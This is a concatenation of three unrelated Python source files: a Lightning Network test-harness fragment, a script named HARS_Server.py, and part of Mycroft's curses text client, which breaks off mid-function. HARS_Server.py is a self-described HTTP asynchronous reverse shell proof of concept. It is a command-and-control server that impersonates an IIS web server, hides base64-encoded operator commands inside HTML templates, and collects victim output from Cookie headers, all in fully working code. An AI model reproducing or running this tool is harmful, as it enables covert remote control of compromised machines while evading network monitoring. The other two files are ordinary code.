while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'may_reconnect',
'random_hsm',
'log_all_io',
'feerates',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(self.get_node, options=cli_opts, **node_opts))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False,
dbfile=None):
with self.lock:
node_id = self.next_id
self.next_id += 1
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, bitcoindproxy=self.bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, 'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start()
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['address']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
raise Exception("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail
|
HARS_Server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# HTTP ASYNCHRONE REVERSE SHELL
# Version : 0.1 POC
# Git : https://github.com/onSec-fr
import BaseHTTPServer, SimpleHTTPServer
import ssl
import os
import base64
import threading
import sys
import random
# Config
PORT = 443
CERT_FILE = '../server.pem'
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# Custom headers
def _set_headers(self):
self.send_header("Cache-Control", "private, max-age=0")
self.send_header("Content-Type", "text/html; charset=utf-8")
self.send_header("Vary", "Accept-Encoding")
self.send_header("Connection", "close")
self.end_headers()
# GET events
def do_GET(self):
if self.path.startswith("/search"):
if initConn == False:
# If client say hello, then reply hello (first connection)
if base64.b64decode(self.headers['Cookie']) == "HELLO":
print(Colors.GREEN + '[!] Connection established with ' + self.client_address[0] + "\n" + Colors.END)
InitConn()
self.send_response(200)
self._set_headers()
cmd = 'HELLO'
encodedCmd = str(base64.b64encode(cmd.encode("utf-8")))
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
outfile = file.read() + encodedCmd
self.wfile.write(outfile)
else:
self.send_response(404)
self._set_headers()
self.wfile.write("Not found")
# Client ask for instructions
elif base64.b64decode(self.headers['Cookie']) == "ASK":
with open('search', 'r') as file:
outfile = file.read()
self.send_response(200)
self._set_headers()
self.wfile.write(outfile)
if (wait == False):
InitFile()
# Client reply with output
else:
resp = base64.b64decode(self.headers['Cookie'])
if resp == "EXIT OK":
stop_server()
else:
print(Colors.LIGHT_WHITE + "\n" + resp + Colors.END)
InitFile()
self.send_response(200)
self._set_headers()
with open('search', 'r') as file:
outfile = file.read()
self.wfile.write(outfile)
CancelWait()
else:
self.send_response(404)
self._set_headers()
self.wfile.write("Not found")
# Save logs
log_file = open('../logs/logs.txt', 'w', True)
def log_message(self, format, *args):
self.log_file.write("%s - - [%s] %s\n" %(self.client_address[0],self.log_date_time_string(),format%args))
def InitConn():
global initConn
initConn = True
def CancelWait():
global wait
wait = False
# Choose random template file
def InitFile():
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
template = file.read()
outfile = open("search", "w")
outfile.write(template)
outfile.close()
class Colors:
BLACK = "\033[0;30m"
RED = "\033[0;31m"
GREEN = "\033[0;32m"
BROWN = "\033[0;33m"
BLUE = "\033[0;34m"
PURPLE = "\033[0;35m"
CYAN = "\033[0;36m"
LIGHT_GRAY = "\033[0;37m"
DARK_GRAY = "\033[1;30m"
LIGHT_RED = "\033[1;31m"
LIGHT_GREEN = "\033[1;32m"
YELLOW = "\033[1;33m"
LIGHT_BLUE = "\033[1;34m"
LIGHT_PURPLE = "\033[1;35m"
LIGHT_CYAN = "\033[1;36m"
LIGHT_WHITE = "\033[1;37m"
BOLD = "\033[1m"
FAINT = "\033[2m"
ITALIC = "\033[3m"
UNDERLINE = "\033[4m"
BLINK = "\033[5m"
NEGATIVE = "\033[7m"
CROSSED = "\033[9m"
END = "\033[0m"
if not __import__("sys").stdout.isatty():
for _ in dir():
if isinstance(_, str) and _[0] != "_":
locals()[_] = ""
else:
if __import__("platform").system() == "Windows":
kernel32 = __import__("ctypes").windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)
del kernel32
# Start http server
def start_server():
global httpd
print(Colors.BLUE + '[!] Server listening on port ' + str(PORT) + ', waiting connection from client...' + Colors.END)
server_class = BaseHTTPServer.HTTPServer
MyHandler.server_version = "Microsoft-IIS/8.5"
MyHandler.sys_version = ""
httpd = server_class(('0.0.0.0', PORT), MyHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile=CERT_FILE, server_side=True)
httpd.serve_forever()
# Exit
def stop_server():
print(Colors.YELLOW + '[!] Exit' + Colors.END)
os.remove("search")
os._exit(1)
if __name__ == '__main__':
# Init
initConn = False
wait = True
InitFile()
try:
# Start http server in separate thread
daemon = threading.Thread(target=start_server)
daemon.daemon = True
daemon.start()
# Wait for first connection from client
while (initConn == False):
pass
while True:
cmd = raw_input("Command> ")
wait = True
print(Colors.BLUE + 'Awaiting response ...' + Colors.END)
encodedCmd = str(base64.b64encode(cmd.encode("utf-8")))
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
template = file.read() + encodedCmd
outfile = open("search", "w")
outfile.write(template)
outfile.close()
# Wait for client's reply
while (wait == True):
pass
except KeyboardInterrupt:
stop_server()
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
from math import ceil
from .gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client import MessageBusClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration
import locale
# Curses uses LC_ALL to determine how to display chars set it to system
# default
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
FULL_REDRAW_FREQUENCY = 10 # seconds between full redraws
last_full_redraw = time.time()-(FULL_REDRAW_FREQUENCY-1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
If default locale supports UTF-8 reencode the string otherwise
remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
##############################################################################
# Settings
config_file = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.set_config_update_handlers(bus)
return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
# Disregard the filtering of DEBUG messages
log_filters = [f for f in config["filters"] if f != "DEBUG"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
except Exception as e:
LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5 muted=0
cur_text, thresh_text, _ = line.split(' ')[-3:]
meter_thresh = float(thresh_text.split('=')[-1])
meter_cur = float(cur_text.split('=')[-1])
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Arguments:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS-x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad-x-len(msg))
else:
# pad to given length (or screen width)
if x+pad > curses.COLS:
pad = curses.COLS-x
s += ch * (pad-len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
# Colors (on black backgound):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(x, y, " "+make_titlebar("= GUI", gui_width-1)+" ", clr=CLR_HEADING)
cnt = len(gui_text)+1
if cnt > curses.LINES-15:
cnt = curses.LINES-15
for i in range(0, cnt):
draw(x, y+1+i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x+2, y+1+i, gui_text[i], pad=gui_width-3)
else:
draw(x+2, y+1+i, "*"*(gui_width-3))
draw(x+(gui_width-1), y+1+i, "!", clr=CLR_HEADING)
draw(x, y+cnt, " "+"-"*(gui_width-2)+" ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_full_redraw
global auto_scroll
global size_log_area
if time.time() - last_full_redraw > FULL_REDRAW_FREQUENCY:
# Do a full-screen redraw periodically to clear and
# noise from non-curses text that get output to the
# screen (e.g. modules that do a 'print')
scr.clear()
last_full_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS-1-len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS-1-len(ver), ver, CLR_HEADING)
y = 2
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[11:] # skip logid & date at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if "| DEBUG |" in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif "| ERROR |" in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG1)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG2)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS-20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
